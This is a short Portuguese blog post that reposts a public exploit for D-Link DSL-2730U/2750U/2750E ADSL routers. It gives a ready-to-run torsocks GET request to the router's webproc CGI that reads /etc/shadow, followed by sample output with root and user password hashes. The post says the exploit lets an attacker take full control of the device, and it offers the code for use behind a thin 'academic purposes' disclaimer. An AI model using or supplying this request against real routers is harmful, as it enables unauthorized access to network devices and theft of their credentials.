Aqui vai um exploit bem interessante para ataques em equipamentos do fabricante D-Link, em especial para o D-Link ADSL Router DSL-2730U / 2750U / 2750E, lembrando que este conteúdo tem fundamento acadêmico e não deve ser utilizado para fins ilÃcitos. (use por sua conta e risco). Este exploit permite (quando bem utilizado), a toma da de controle de um equipamento D-Link. Isso significa que o atacante consegue acesso completo ao equipamento ignorando senhas e diretrizes de segurança.
A matéria originariamente foi veiculada pelo Link: https://www.exploit-db.com/exploits/40735/
#!/bin/sh
#
# D-Link ADSL ROUTER DSL-2730U IN_1.02
# Remote File Disclosure
#
# Modem Name: DSL-2730U/DSL-2750E
# Time and Date: 2012-05-23 09:51:16
# HardwareVersion: U1
# Firmware Version: IN_1.02/SEA_1.04/SEA_1.07
#
# Copyright 2016 (c) Todor Donev
# <todor.donev at gmail.com>
# https://www.ethical-hacker.org/
# https://www.facebook.com/ethicalhackerorg
#
# Disclaimer:
# This or previous programs is for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
# Thanks to Maya Hristova that support me.
[todor@adamantium ~]$ torsocks GET "http://TARGET:PORT/cgi-bin/webproc?getpage=/etc/shadow&errorpage=html/main.html&var:language=en_us&var:menu=setup&var:page=wizard"
# #root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::
# root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::
# #tw:$1$zxEm2v6Q$qEbPfojsrrE/YkzqRm7qV/:13796:0:99999:7:::